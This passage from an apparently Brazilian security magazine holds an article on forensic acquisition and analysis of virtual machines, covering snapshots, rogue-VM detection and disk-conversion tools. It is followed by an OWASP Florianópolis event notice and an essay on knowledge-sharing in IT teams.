fcil apresentao a quem quer que possa ter acesso de terminada evidncia quando da ocorrncia de algum delito, uma vez que a maioria dos usurios est fami liarizada com uma interface de computador moderno. Criar uma imagem forense em uma VM possibili ta a distribuio da carga de trabalho durante a inves tigao de um determinado caso, onde o perito pode realizar exame preliminar em um dado nmero de unidades de prova. Em casos extremos, onde a obteno de uma ima gem no for possvel, os ambientes virtuais podem
2.2 Preparo de Ambientes Virtuais para Anlise Forense Computacional

Antes de capturar a mquina do suspeito e criar imagens, necessrio se preparar um computador para uslo como mquina forense, devendo este ser o mais rpido e mais performtico possvel tanto em desempenho quanto em capacidade. Se se estiver tra balhando em um laboratrio forense, onde possvel segregar as redes, os discos rgidos podem ser unida des de rede ou SANs, os quais devem ser de uso ni co e no podem ser usados para qualquer outro tipo de armazenamento. Quando da remoo de dados, arquivos e/ou quaisquer outras informaes do disco rgido, necessrio que se use utilitrios de excluso segura, de modo a se garantir que no permaneam quaisquer tipos de dados h dados vestigiais. Sendo que em alguns casos h a possibilidade de se usar novas mdias para cada caso, uma vez que se argu menta que cada caso requer novos discos rgidos. O computador e o ambiente virtualizado devem ser protegidos contra ataques externos e internos e, em particular, contra ataques de dentro do sistema virtual. Para isso, j possvel encontrar documenta es e boas prticas de mercado que orientam nesse sentido. Uma vez montando e assegurado o ambiente, de vese criar um inventrio de todos os sistemas, apli cativos e hardware utilizados (tanto reais quanto virtuais). Esse inventrio deve ser colocado sob con trole de configurao para que, enquanto se faa al teraes no ambiente, simultaneamente se atualize sua documentao, devendo cada anlise forense ter uma cpia do seu inventrio documento como ele existiu durante a investigao.
2.3 Coleta de Dados Forenses em Ambi entes Virtuais Localizao e Captura

Investigar um crime computacional pode ser um processo muito demorado e complexo. A primeira re gra do trabalho forense que as provas devem ser preservadas. A prtica forense comum, quando da ocorrncia de um delito digital, fazer uma imagem
|15
de todas as mdias. Todos os dados devem ser copia dos com cuidado para que as evidncias no sejam modificadas (so as chamadas cpias ou imagens fo renses). Assim sendo, todos os procedimentos refe rentes investigao so realizados nessas cpias forenses dos dados. igualmente importante que os resultados dos exames forenses sejam documentados, para que o perito forense computacional seja capaz de elaborar e entregar a outro perito uma cpia fiel da imagem forense que est sob sua investigao, bem como do seu laudo. Dessa forma, esperase que uma segunda investigao da mesma imagem forense conduza aos mesmos resultados que foram original e primariamente feitas. Quando o alvo de determinada investigao foren se computacional conhecido, relativamente sim ples proceder sua anlise. Porm, muitas vezes, as evidncias tm que ser coletadas e analisadas sem se conhecer o ambiente relacionado, devendose investi gar acerca de quem detm os dados e onde esto ar mazenados. Quanto coleta e anlise de evidncias em ambientes virtuais, tornase necessrio se apren der como funcionam e quais arquivos so interessan tes para se coletar e analisar. O estado da arte para a coleta de dados forenses em ambientes virtuais recolher pouco a pouco a du plicata de uma imagem de disco usando um duplica dor ou ferramentas de duplicao via rede. Se houver necessidade das imagens da memria, isso requer um tempo ainda maior, de forma que seja possvel reali zar a duplicao da memria antes de se congelar a execuo do host virtualizado. Cabendo ressaltar que muito mais fcil criar uma duplicao forense de um disco virtual do que de um real. Tomando por referncia uma duplicao post mor tem, a duplicao de um HD real pode ser to sim ples quanto usar um software de aquisio forense diretamente na mdia desligada, ou to complicada quanto analisar um monte de discos em RAID. Con tudo, mesmo nos casos mais triviais, h certo traba lho. Porm, quando se trata de duplicar um disco virtual, todo o trabalho se reduz em realizar a cpia e o hash do arquivo que representa o disco. Colocandose de maneira bem simplificada, pos svel se fazer a aquisio post mortem e ter uma vi so esttica dos dados de um HD, ou ento realizar a anlise forense do tipo live, onde o computador con tinua ligado. Como j tratado anteriormente, essa se gunda modalidade mais rpida e tem o benefcio de no precisar desligar a mquina, mas a viso dos da
dos dinmica, o que traz imediatas consequncias, pois antes da aquisio chegar ao final, o contedo capturado do incio da mdia j pode ter sido altera do. Com isso, o hash no ser capaz de comprovar integridade com a mdia, por exemplo. Nesse caso, a captura de uma imagem forense de uma mquina vir tual oferece uma terceira opo: ela funciona como uma semilive. A ideia bem simples basta ir ao gerenciador da mquina virtual e interromper a exe cuo dela temporariamente. Em geral, o comando que realiza essa tarefa se melhante a uma pausa. Podese interromper e retor nar a execuo de uma mquina virtual a qualquer momento. Ao interromper, o arquivo de disco virtual pode ser copiado normalmente e, ao fim da cpia, re tornase a mquina ao estado de execuo sem mais demoras. Dessa forma, o maior benefcio dessa tc nica pode ser a possibilidade de ter novamente uma viso esttica da mdia, alm de permitir retornar a mquina bem mais rpido que no caso de uma aqui sio post mortem. Contudo, a maior diferena, que torna um pouco mais difcil a aquisio de dados, o fato de que no haver acesso fsico ao servidor onde as mquinas esto virtualizadas (servidor de virtuali zao). Mesmo assim, possvel pausar o funciona mento da VM e capturar seu estado atual. Normalmente, o gerenciamento de cada mquina virtualizada feito atravs de um painel de controle via web, onde permitido a criao, excluso, dupli cao, execuo, pausa e desligamento de cada uma das mquinas disponveis para uso. Ante ao exposto, podese afirmar que a maioria das ferramentas utilizadas em um ambiente real (fsi co), tambm se aplica a ambientes virtuais. Porm, possvel se acrescentar que a aquisio de dados em ambientes virtuais bem mais fcil e tranquila do que em um servidor real em produo, pois basta, na maior parte das vezes, duplicar a imagem do disco e remontlo em um ambiente virtualizado, sem pre juzos para o sistema em produo.
2.3.1 Deteco de Mquinas Virtuais Pro mscuas

A princpio, as mquinas virtuais promscuas no so diferentes de mquinas fsicas promscuas. Uma mquina promscua aquela que no foi colocada no ambiente de acordo com seus padres, recomenda es e requisitos de negcio, e que no controlada pelo departamento de TI. O exemplo mais comum disso de um servidor DHCP promscuo, j que ele
|16
fornece os endereos IP e permite acesso rede. Em muitas organizaes, polticas de segurana so im plementadas a fim de se evitar que mquinas proms cuas (fsicas ou virtuais) tenham acesso ao ambiente. Contudo, no cenrio da virtualizao e de ambientes virtuais, o controle de mquinas virtuais ainda dif cil de ser monitorado. Devido natureza das VMs, criar uma mquina virtual promscua relativamente fcil, especialmen te no ambiente do usurio. Um usurio pode fazer uma ponte de conexo de rede entre uma VM e uma estao de trabalho atravs do endereo IP desta. VMs podem ser instaladas em um software aplica tivo como o Virtual PC ou VMware Workstation, o que significa que um usurio pode baixar mquinas e ambientes virtuais prconfigurados e utilizar um aplicativo como o VMware Player, por exemplo, para executlos. Outra possibilidade se executar a m quina virtual a partir de um dispositivo USB atravs de um ambiente virtual como o MokaFive (mquina virtual que emula outros sistemas operacionais), o qual ser mais detalhadamente tratado adiante. Uma das principais caractersticas das mquinas virtuais que permite a promiscuidade nesse tipo de ambiente a capacidade de se utilizar os recursos de do host para conectividade. As configuraes de rede para uma VM podem ser feitas por pontes (bridges) ou por NAT. A tcnica de ponte (bridging) mais simples e permite o encaminhamento e a comunica o entre plataformas diversas. Para isso, a placa de interface de rede fsica encaminha o trfego das VMs para a rede. O NAT modifica os pacotes individual mente, alterando o cabealho para se ter ou um novo endereo de origem, ou um novo endereo de desti no, ou ambos. A VM que se utiliza da bridge entre redes ir apa recer na rede como uma mquina normal mostrando seus prprios endereos MAC e IP. O NAT permite que uma VM se conecte rede atravs da placa de re de fsica. Esse tipo de trfego aparece na rede como sendo original do sistema fsico e mostra os endere os MAC e IP da mquina fsica. O NAT das VMs traduz os endereos, fornecendo os servios de DNS e de DHCP. Quando do uso de NAT, as VMs no gerenciadas podem acessar a rede, o que pode acarretar nas se guintes implicaes: Instalao de softwares maliciosos Vulnerabilidade na rede devido a VMs sem atua
lizaes Problemas de rede e de comunicao entre clien tes. A criao e a aplicao do uso de polticas de se gurana para lidar com tais situaes seria uma ma neira complexa para se proteger a rede nesses casos, mas muitos ambientes no tratam dessas questes. Contudo, sua auditoria deve ser realizada peridica e constantemente o que pode detectar a presena de VMs promscuas. Como visto anteriormente o VMware instala au tomaticamente dois adaptadores de rede virtuais na mquina. Uma indicao de que um usurio instalou uma VM seria a presena dessas placas. Assim sen do, se se souber que os usurios podem instalar m quinas virtuais no ambiente, o VMware Bridge Protocol e o Virtual Machine Network Services de vem ser desativados. Isso desativa o suporte a redes em modo bridge e o emulador de dispositivos do sis tema operacional, evitandose que as VMs utilizem as funes de rede que permitam seu acesso externo e/ou interno ao ambiente virtualizado em questo. As duas interfaces virtuais de rede instaladas pelo VMware em mquinas fsicas so a VMware Network Adapter VMnet1 e a VMware Network Adapter VMnet8. A primeira permite que as mqui nas virtuais se comuniquem com o host fsico do sis tema. A segunda permite que as mquinas virtuais usem o NAT para a comunicao com a rede. No caso de um perito computacional forense ter que procurar VMs promscuas, existe dois scripts criados por WOLF (2010) o Domainvhdaudit.vbs e o Vhdaudit.vbs, os quais podem ser utilizados para se inventariar arquivos virtuais em servidores de dom nio. O primeiro utilizado em domnios Active Di rectory e gera uma lista de arquivos virtuais presentes em disco, tais como arquivos de extenso .vhd e .vmdk. O segundo fornece as mesmas infor maes de sada do primeiro, contudo se destina a ser utilizado localmente em um nico computador. Em sntese, ambos os scripts fornecem um mtodo de lo calizao de arquivos do tipo .vhd e .vmdk, bem co mo alertam o perito sobre arquivos grandes que possivelmente possam ser mquinas virtuais. Cabe ressaltar que nem sempre os scripts mencio nados acima encontram todas as VMs promscuas. O fato de eles procurarem arquivos grandes bom por que ajuda a identificar dados escondidos, mas h problemas quanto localizao de arquivos ADS
|17
(tcnica que pode ser utilizada para se ocultar um de terminado arquivo) inerentes estrutura da composi o do sistema de arquivos do tipo NTFS (basicamente um stream de dados que pode ser adi cionado a um arquivo j existente, mas que fica ocul to para qualquer pessoa que acesse o sistema), os quais possibilitam o gerenciamento de dados como uma nica unidade e constituem esconderijos perfei tos para todos os tipos de dados, incluindo os de m quinas virtuais. Isso posto, j sabido que a busca de VMs com base exclusivamente na extenso de arquivo pode no conduzir localizao de todas as mquinas vir tuais promscuas em um ambiente. Procurar caracte rsticas que so constantes no uso de VMs pode produzir resultados adicionais.
2.3.2 Diferenas entre Real e Virtual

Ao se conduzir uma anlise forense computacio nal, importante que se determine se o ambiente a ser analisado real ou virtual, a fim de que nenhuma evidncia obtida seja questionada. Para isso existem vrios mtodos, j que as alteraes so feitas no am biente de acordo com o funcionamento do hypervi sor. Por exemplo, mquinas virtuais executam instrues no processador fsico e, portanto, fazem alteraes no ambiente de modo a possibilitar o com partilhamento de recursos de hardware entre o SO convidado (virtual) e o SO host (real). Assim sendo, algumas dessas modificaes so visveis para apli cativos no sistema operacional convidado. Ao se analisar ambientes virtuais, importante re fletir sobre o que est sendo capturado. Mantendose em mente que essas ferramentas so baseadas nas mudanas feitas pelo hypervisor no ambiente e ape nas funcionam em plataformas que se utilizem de hy pervisors. Sendo possvel, ainda, detectar VMs atravs de verificao de compatibilidade de CPU.
Assim sendo, mesmo que se esteja trabalhando em uma imagem deve se ter cautela e cuidado, pois os arquivos podem sofrer alteraes caso o ambiente no esteja montado e configurado correta e adequa damente de maneira forense. Primeiramente cabe ressaltar que as VMs so ar quivos contidos em unidades fsicas. Se a VM em si o nico item de interesse, pode no haver a neces sidade de se coletar toda a unidade. Em determinadas situaes, pode at no ser possvel se coletar a ima gem de um disco inteiro, como no caso de uma SAN, ou de um servidor de virtualizao que pode hospe dar vrias VMs. Contudo, h situaes em que inva riavelmente todo o ambiente dever ser coletado, especificamente nos casos em que ele tiver seu pr prio registro, pastas e arquivos independentes da m quina e do SO host. O fato de se coletar e copiar toda uma unidade se ria aquele em que o ambiente virtualizado tenha pas tas compartilhadas na mquina host. Ferramentas de virtualizao podem instalar pastas na mquina host onde suas mquinas virtuais sero armazenadas, co mo o caso do MokaFive, por exemplo. Assim sen do, evidncias podem ser facilmente perdidas se no se capturar todo o ambiente. De acordo com (WOLF, 2010), um mtodo para exportao de uma mquina virtual utilizar o pro grama associado VM. Assim como o ambiente vir tualizado inicializa em seu prprio sistema operacional, ele pode ser inicializado em um ambi ente forense atravs de uma mdia forense, como um disco forense. Dessa forma, o ambiente de inicializa o forense permite que a VM seja coletada de ma neira adequada luz forense, de tal sorte que a mquina virtual seja capturada sem se alterar quais quer arquivos no ambiente virtualizado original.
2.3.4 Snapshots
O snapshot de uma mquina virtual consiste em se capturar o estado da VM em um ponto especfico no tempo (estado especfico em um determinado mo mento), atravs de arquivos a partir dos quais as con figuraes da mquina virtual podem ser restauradas. Assim sendo, o snapshot inclui, basicamente, a con figurao, os dados do disco e o estado atual do am biente virtual. O objetivo permitir o usurio reverter ao snapshot no caso de algo acontecer VM e que impea seu funcionamento correto. Esse prin cpio semelhante ao de um ponto de restaurao de sistema operacional.
2.3.3 Coleta de Mquinas Virtuais

H vrias razes para se coletar e/ou capturar m quinas virtuais, sendo que a anlise forense computa cional do tipo live a mais adequada para os casos de ambientes virtuais (a qual ser tratada mais adian te). A cpia desses arquivos permitir mquina vir tual inicializar e isso possibilitar ao perito visualizar o ambiente, bem como acesslo, mas isso ir modifi car seus arquivos. Contudo, as melhores prticas fo renses recomendam no se alterar a mdia original.
|18
De acordo com (VMware, 2011), quando se usa um snapshot, as definies de configuraes a serem revertidas, se necessrio, incluem nomes DNS, UID e verses de patch do SO convidado. Os arquivos dos dados de snapshots so armaze nados como quaisquer arquivos e geralmente locali zamse, por padro, na mesma pasta da mquina virtual. Porm, se a VM foi importada com snapshots, so armazenados em sua prpria pasta e se a mquina virtual no tem snapshots, suas configura es permitem que sejam armazenados em uma pasta especfica (customizada). As funes associadas com os snapshots so as seguintes: CreateSnapshot cria um novo snapshot e atuali za o atual RemoveSnapshot remove um snapshot e qual quer armazenamento associado RemoveAllSnapshots remove todos os snapshots RevertToSnapshot reverte uma mquina virtual em um snapshot. Esse conceito importante por duas razes. Pri meiro porque os snapshots, assim como os pontos de restaurao, podem conter informaes vitais que po dem no ser mostradas no estado atual da mquina. Segundo, uma vez que cada snapshot gera um novo disco a partir do ltimo, o relacionamento entre am bos pode mudar, podendo haver vrias associaes na cadeia de snapshots e a reconstruo dos pode exi gir que se localize todos os snapshots. Abaixo se apresenta uma lista dos arquivos associados a snapshots, cabendo ressaltar que os arquivos de snapshots comeam pequenos (com cerca de 16 me gabytes) e podem crescer at o tamanho do disco: Arquivo delta.vmdk tambm conhecido como arquivo de reconstruo de log. Basicamente, um bitmap das alteraes para a base VMDK. Sendo que para cada snapshot um arquivo do tipo delta.vmdk criado e automaticamente apagado quando o snapshot excludo ou revertido. Arquivo .vmsd armazena metadados e informaes sobre os snapshots. armazenado como texto e no totalmente apagado aps o uso de um snapshot. Arquivo .vmsn contm o estado do snapshot e pode preservar a memria da VM como parte do snapshot, sendo semelhante ao arquivo de estado
de uma VMware suspensa (.vmss).
2.3.5 Ferramentas para Localizao e Co leta de Mquinas Virtuais

As anlises forenses computacionais dos mais di versos tipos de ambientes virtuais incluem a pesquisa e utilizao de ferramentas que sejam capazes de converter uma imagem virtual em um formato uni versal e mais acessvel, a fim de que o perito encon tre uma maneira em que seja possvel se converter e montar um ambiente virtual para exame de tal forma que seus arquivos originais no sejam alterados. A maioria dos softwares para anlise forense computacional no tem capacidade de analisar apro priadamente uma mquina virtual localizada dentro de uma imagem. Esses programas reportam os arqui vos que compem a mquina virtual como sendo ti pos de arquivos desconhecidos. Mesmo que uma mquina virtual possa ser exportada ou transferida para outra mquina virtual, quando a VM suspeita carregada, as informaes de arquivos dentro da m quina virtual original mudam. Algumas ferramentas forenses comerciais tm a capacidade para montar os arquivos de uma mquina virtual. A ferramenta para anlise forense EnCase, por exemplo, permite que um arquivo do tipo .vmdk seja adicionado como uma evidncia para investiga o, conforme mencionado anteriormente. Para isso, o arquivo .vmdk deve ser exportado e, em seguida, adicionado separadamente. Uma vez que o arquivo .vmdk adicionado ao caso, o EnCase o enxerga co mo um disco rgido da mquina virtual. Entretanto, outros formatos de arquivos j no so to simples mente montados e reconhecidos por essa ferramenta, os quais devem ser mais especificamente configura dos o que requer um pouco mais de complexidade e expertise do perito. Ainda no bojo de ferramentas para anlise forense computacional, podese citar o FTK que tambm consegue abrir arquivos do tipo .vmdk e coletar sua imagem. Sendo que outros softwares forenses como o Live View, por exemplo, so capazes de montar uma imagem protegida de escrita (writeprotected) de modo que nenhuma modificao seja feita na mesma. Porm isso apenas o comeo, pois nem todos os ambientes virtuais so fceis de analisar. Ademais, na prtica, arquivos do tipo .vmdk VM so uns dos pou cos arquivos de mquinas virtuais que podem ser fa cilmente reconhecidos para anlise em softwares
|19
forenses. A fim de se chegar a algum tipo de processo que possa ser empregado na converso e montagem de uma imagem forense sem se alterar a imagem origi nal, h experimentos prticos e metodologias nessa rea que envolvem arquivos do tipo .vhd de ambien tes Microsoft, j que esta uma das plataformas mais utilizadas e constitui uma das imagens mais prov veis de se encontrar em uma anlise forense compu tacional. Nesse processo de experimentao e metodologia para anlise de um arquivo .vhd, pode se utilizar o software WinImage para copiar, conver ter e montar o arquivo da mquina virtual. Os seguin tes passos devem ser tomados: Criar a imagem do disco virtual da mquina analisada Executar o hash da imagem do disco para controle de acesso e cadeia de custdia Acessar o disco com o WinImage e extrair os arquivos de evidncia necessrios Executar novamente o hash da imagem do disco para verificar se o WinImage no modificou o disco virtual original Carregar os arquivos extrados para a ferramenta de anlise forense. Este processo no altera nenhum dos arquivos j que os valores de hash obtidos so os mesmos antes e depois da cpia pelo WinImage. Como os fornecedo res comearam a aderir aos padres, a dificuldade de se encontrar ferramental que reconhea e converta formatos de arquivo deve diminuir. Embora arquivos do tipo .vhd possam ser carregados em alguns softwares para anlise forense, importante entender que a experimentao/metodologia proposta acima pode ser o nico recurso quando for necessrio se examinar um formato que determinada ferramenta no conseguir interpretar. A seguir, sero discutidas algumas das ferramen tas que esto disponveis para converso e montagem de arquivos de formatos diversos, a fim de que o am biente possa ser facilmente analisado. Sendo que qualquer processo para se converter e montar ambi entes virtuais deve ser cuidadosamente documentado, pois sua solidez forense pode ser questionada. Live View: Essa ferramenta talvez uma das mais usadas pa ra se criar uma mquina virtual no VMware tanto em
um disco primrio quanto em um disco fsico qual quer. H bastantes trabalhos e experimentos desse processo. Sendo que o Live View permite ao perito inicializar suas anlises a partir da imagem ou do disco e enxergar o ambiente tal qual um de seus usurios, sem modificar a imagem original ou o dis co. O Live View capaz de inicializar outros sistemas operacionais tanto da plataforma Microsoft quanto Linux nos seguintes tipos de formatos: Imagens completas de disco primrio Imagens de partio primria inicializvel Discos fsicos (seja via USB ou FireWire) Formatos de imagens especficos ou fechados.
WinImage: O WinImage uma ferramenta para imagem de discos e serve para criao, leitura e edio de ima gens de sistemas de arquivos do tipo FAT, NTFS e EXT2. A imagem do disco criada por esse software uma cpia exata do disco fsico ou da partio e pre serva a estrutura original. Ele pode ser usado para os seguintes tipos de formatos: DMF VHD ISO IMA IMZ Cue.
Virtual Forensic Computing: A VFC uma ferramenta forense utilizada para converso de unidades de disco fsicas e arquivos de imagem forense. A evidncia original somente de leitura e no pode ser escrita diretamente. Alm dis so, arquivos de imagens forenses montados so aber tos como somente leitura por padro. Cabe ressaltar que o VFC pode inicializar em sistemas operacionais Microsoft e suporta os seguintes formatos: Mount Image Pro v2 Physical Disk Emulator Discos fsicos do tipo IDE, SATA, USB e IEEE1394. A montagem de arquivos em formatos de mquina virtual apresenta alguns desafios. O principal deles
|20
a capacidade de se montar a VM, de acordo com as prticas forenses, sem se alterar o ambiente. Feliz mente, os fabricantes de softwares esto trazendo al gumas contribuies na rea forense. Sendo que alguns dos programas mais eficientes so: EnCase ProDiscover Forensic Replicator FTK.
2.3.6 Coleta entre Ambientes Virtuais

De vez em quando, um ambiente virtual pode pre cisar ser convertido de um formato para outro. Des tarte, se a ferramenta de anlise forense utilizada no entender o formato de arquivo de determinada m quina virtual que precise ser examinada, outro ferra mental/metodologia especfico para esse fim pode ser usado, como no caso de converso de arquivos do ti po .vmdk para arquivos do tipo .vhd, por exemplo, onde podemos citar o VirtualBox que bastante ver stil e consegue converter arquivos .vhd e .vmdk em arquivos .vdi. Para isso, o processo o seguinte: Instalase o QEMU (que , basicamente, um software livre que implementa um hypervisor e emula um processador, permitindo uma virtualizao completa de um sistema dentro de outro) Convertese o arquivo para um arquivo .bin. Para isso, podese digitar o seguinte comando: qemu img convert harddrivename.vmdk rawfile.bin Depois que o arquivo for convertido, devese convertlo para formato .vdi usandose o VBoxManage. Uma aplicao virtual VMware pode ser converti da para funcionar em outras plataformas de virtuali zao como o Parallels. Para isso, o processo ir converter imagens de disco do tipo IDE da seguinte maneira: Convertese a imagem do formato VMware para um disco rgido primrio usandose o seguinte comando: qemuimg convert applianceharddrive name.vmdk O raw applianceharddrivename raw.hdd Criase uma mquina virtual Substituise o Disco Rgido 1 com a imagem de disco rgido criada a partir da imagem VMware convertida.
O pertinente em ambos os processos se obter a imagem do VMware dentro de uma imagem de disco rgido primrio. Entretanto, h inmeros diferentes tipos de VMDK e QEMU e no h como se converter todos eles. O Vmdk2Vhd um utilitrio simples para con verso de imagens de disco rgido virtual de formato VMDK do VMware em formato VHD da Microsoft, atravs de uma operao de cpia de setor por setor de um formato para o outro, a qual mantm o arquivo fonte (original) inalterado. O StarWind Converter uma ferramenta de con verso V2V para mquinas virtuais. Ela pode ser usado para se converter arquivos .vmdk em .vhd e viceversa, bem como em arquivos .img, que um formato nativo do StarWind. Finalmente, a Microsoft oferece uma ferramenta prpria do System Center Virtual Machine Manager, que oferece opes para converso de mquinas vir tuais do VMware para o formato VHD.
Continua na prxima edio...
Deivison Pinheiro Franco

Graduado em Processamento de Dados. Especialista em Redes, Suporte a Redes e Cincias Forenses. Arquiteto de Infraestrutura de TI. Professor de Informtica Forense, Segurana da Informao, Redes, SO e Arquitetura de Computadores. Perito Forense Computacional e Pentester. Certificaes: CEH, CHFI, DSFE e ISO/IEC 27002..
Email: deivison.pfranco@gmail.com Link: http://lattes.cnpq.br/8503927561098292
|21
Sobre o OWASP
O Open Web Application Security Project (OWASP) um projeto open source voltado para promover a segurana de aplicaes no uso por em presas, entidades educacionais e pessoas em todo o mundo. Todos os membros so voluntrios que dedi cam seu tempo e energia para a organizao. Os membros da OWASP, com apoio de organizaes educacionais e comerciais formam uma comunidade de segurana que trabalha em conjunto para criar me todologias, documentao, ferramentas e tecnologias para a segurana das aplicaes web. Toda essa estru tura fomentada por patrocinadores. Existem duas principais formas de patrocinar a fundao: associan dose como empresa ou individualmente ou por meio de patrocnio de projetos. Entre seus patrocinadores empresariais esto nomes como: Amazon, Adobe, Qualys, Nokia, IBM, (ISC)2, Oracle entre outras grandes empresas.
tidos pela rea com palestrantes amplamente respei tados pela comunidade de segurana da informao nacional e internacionalmente.
OWASP Floripa Day

A primeira edio do OWASP Floripa Day ser realizada entre os dias 15 e 16 de setembro de 2012, em Florianpolis. Sero dois dias de palestras espe cficas na rea de segurana de aplicaes ministrada por profissionais do Brasil e exterior. OWASP FLO RIPA DAY o nico evento realizado em Florian polis totalmente dedicado a segurana de aplicaes e que ir se consolidar como um encontro nico de pesquisadores, arquitetos de sistemas, lderes e ges tores tcnicos de empresas. Este tipo de evento sem pre atrai uma audincia mundial interessada em conhecer as tendncias e caminhos futuros da segu rana em aplicaes e alm da cobertura proporcio nada pela mdia local divulgado em canais dedicados segurana que atingem profissionais de todo o mundo. Quem dever atender ao OWASP FLORIPA DAY 2012: desenvolvedores de aplicati vos, testadores de aplicativos e de qualidade, geren tes de projetos de aplicativos e funcionrios, associados e membros da OWASP, auditores, e pes soas responsveis pela segurana de TI e compliance, gerentes de segurana e pessoal, executivos, gerentes e pessoas responsveis pela governana de TI, pro fissionais de TI interessados em aprofundar seus co nhecimentos em segurana.
Sobre o captulo de Florianpolis

Florianpolis est se consolidando, no cenrio na cional e internacional, como um polo de empresas de base tecnolgica. Possui cerca de 600 empresas de software, hardware e servios de tecnologia. Por esta razo um captulo da OWASP foi aberto em Floripa para despertar a conscientizao das pessoas envolvi das com tecnologia da informao em relao segu rana das aplicaes. O captulo do OWASP em Florianpolis busca educar a comunidade, empresas, professores, e pessoas interessadas nesta rea sobre a importncia da segurana de aplicaes. O captulo de Floripa tambm procura capacitar e aperfeioar os profissionais, atravs de lista de discusso, mini cur sos realizados nos meios acadmicos, encontros para debates e eventos com palestras focadas nas mais avanadas tcnicas e nos assuntos mais atuais discu
http://www.owasp.org https://www.owasp.org/index.php/Florianopolis OWASP Floripa Day: https://www.owasp.org/index.php/OWASP_Floripa_D ay_2012

|22
Conhecimento Motivao
comum observarmos em muitas empresas de TI o papel do profissional faz tudo, o indispensvel, o cara, o tal que sabe tudo, ou seja, aquele que realmente conhece todo o processo tcnico e organi zacional de uma empresa, o funcionrio a quem to dos recorrem nos perodos de crise, de desespero, da soluo que faltava para um determinado projeto de colar. Notase que muitos gestores e dirigentes de companhias no intervm nesse comportamento no mnimo arriscado para a continuidade de negcios dessa organizao e para o crescimento e sucesso dos demais colaboradores. Antes de tudo importante frisar a relevncia da competncia tcnica e o autoconhecimento que esse profissional possui e aprendeu a desenvolver ao lon go de sua carreira. Um profissional com esse nvel de destaque merece o reconhecimento pelo seu perfil de busca do aprendizado prprio, do desenvolvimento contnuo de suas competncias e habilidades que lhe permite a posio destacada e o crescimento dentro da carreira. Mas at que ponto manter essa estrutura com um ou dois profissionais desse nvel importante para uma empresa? O sucesso da corporao certeza ga rantida? No, definitivamente no. O sucesso nesse
caso ser garantido at a permanncia desse profissi onal dentro da companhia ou ter o momento em que esse mesmo profissional conseguir resolver todos os problemas e solues ao mesmo tempo sem impactar na entrega do servio ou produto. Aos olhos dos gestores esse papel fundamental, pois at ento os resultados esto sendo atingidos e dentro do esperado. Porm eles no percebem que esto criando para si mesmos uma bomba relgio que pode explodir a qualquer momento e que poder co locar a empresa numa situao difcil, aumentando seus custos e reduzindo suas receitas. E o que acontece nesse caso? Identificamos o clssico caso de no difuso do conhecimento dos processos tcnicos e o aumento da dependncia do profissional faz tudo para resolver todos os proble mas de TI. Depositar todos os ovos em uma nica cesta no o caminho mais seguro e em algum mo mento o revs pode acontecer e colocar em risco no somente a gesto de TI, mas qui a organizao co mo um todo. O que acontece que em torno desse profissional faz tudo, os demais so apenas coadjuvantes limi tados no seu crescimento por falta de uma gesto efi ciente que o permita evoluir e infelizmente no
|23
progridem e nem avanam nos conhecimentos tcni cos do negcio da companhia e acabam se vendo nu ma situao desesperadora, pois desconhecendo o caminho para as solues dos problemas mais crti cos, acabam no entregando os resultados esperados e impactando na viso da empresa para os clientes que provavelmente comearo a questionar a quali dade dos produtos e/ou servios que outrora eram oferecidos dentro de um patamar elevado. O que eu proponho no novidade alguma, mas ratificar a necessidade dos gestores e donos de em presa de conhecerem a importncia que as reas de conhecimentos tcnicos bem como sua difuso tm para a continuidade do seu negcio com sucesso, principalmente quando a relevncia de TI alta den tro do contexto da organizao.
Figura 1 - Profissional "faz tudo".
Mas por onde comear? No h uma receita e muito menos feitiaria ou milagre, mas sim muito trabalho, dedicao e apoio de todos para o sucesso do projeto. O esforo inicial, o trabalho bem feito de organizao das informaes e o acompanhamento contnuo das reas de conhecimento trar o retorno
mais cedo do que se espera, tanto para a empresa quanto para os profissionais. O apoio da alta diretoria imprescindvel para o sucesso desse projeto. importante que o profissio nal de TI identifique a importncia e a relevncia do seu papel para a empresa e esse retorno obtido quando seus gestores esto acompanhando e alimen tando de informaes necessrias para o desenvolvi mento da sua carreira profissional. O prximo passo registrar todos os processos executados pelos profissionais e documentlos den tro um sistema onde todos possam ter acesso. Redigir os processos trar mais conforto e certeza na execu o das atividades, pois no ser mais algo do co nhecimento de um nico profissional a quem todos recorrem para buscar o entendimento. O bom profis sional descobrir que sabendo onde est pisando lhe trar mais segurana para desenvolver seu trabalho, abrindo novas portas e oportunidades de crescimento contnuo. To importante quanto a criao dos pro cessos tambm a reviso peridica dos mesmos a fim de que estejam sempre atualizados e fiis ao que est sendo executado e trabalhado por todos. Nesse momento vamos atingir o ponto de exce lncia do conhecimento do negcio, pois a empresa no depender mais de um profissional, mas sim to dos tero participao na execuo e crescimento da empresa com relevncia e tendo sempre a oportuni dade de desenvolver cada vez mais suas habilidades dentro da rea ou at mesmo fora dela, atuando como um possvel gestor da empresa. Um terceiro ponto importante mapear todas as reas de conhecimento que compem a parte tcnica dos processos. Esse ponto com certeza o detalhe do detalhe, pois o gestor ter em suas mos o mapa completo de suficincia ou fraqueza de uma habili dade ou competncia de componente tcnico que vital para a operao dos seus processos ao mesmo tempo em que aumenta a capacidade e o deslumbra mento dos funcionrios de crescimento dentro da carreira tcnica. Primeiramente o gestor deve mapear as reas ma cros que compem o seu negcio de TI. Podemos ci tar, por exemplo, a rea Segurana, Infraestrutura de armazenamento de dados, Virtualizao, Banco de dados e equipamentos de rede. Sabendo que essas reas so imprescindveis o prximo passo detalhar
|24
os itens tcnicos que as compem. Em banco de da dos, por exemplo, podemos ter em nossa organiza o, trs tipos de fabricantes diferentes. Em seguida descrever a criticidade de cada rea atravs da sua re levncia e aquisio/reposio desse conhecimento. Por fim relacionar cada um dos funcionrios e asso cilos dentro de uma escala de conhecimento e habi lidade para cada uma dessas reas. No fim, o gestor ter um mapa completo de todas as reas de conhecimento tcnico, sua relevncia e criticidade para o negcio e a relao dos profissio nais que possuem tal conhecimento e habilidade para cada rea. O gestor far um trabalho de acompanha mento contnuo promovendo o crescimento das reas onde possui mais escassez de profissional ao mesmo tempo em que promove a difuso do conhecimento a todos.
mente de forma que cada profissional passe o seu co nhecimento para os demais aumentando e fortalecendo a base tcnica e operacional de TI desta empresa promovendo tambm o autoconhecimento, a inovao e a cooperao. Por fim, eu acredito que uma gesto que prioriza o planejamento das reas de conhecimento est forta lecendo o que de mais importante agrega valor para um negcio ou para uma empresa: As Pessoas. Pes soas motivadas so pessoas que conhecem os proces sos, so cientes das suas responsabilidades, reconhecem as perspectivas de crescimento profissi onal e tem o apoio dos seus gestores. O sucesso da empresa ser muito factvel e previsvel neste cenrio de ganhaganha e assertividade.
Leonardo Pereira Guimaraes

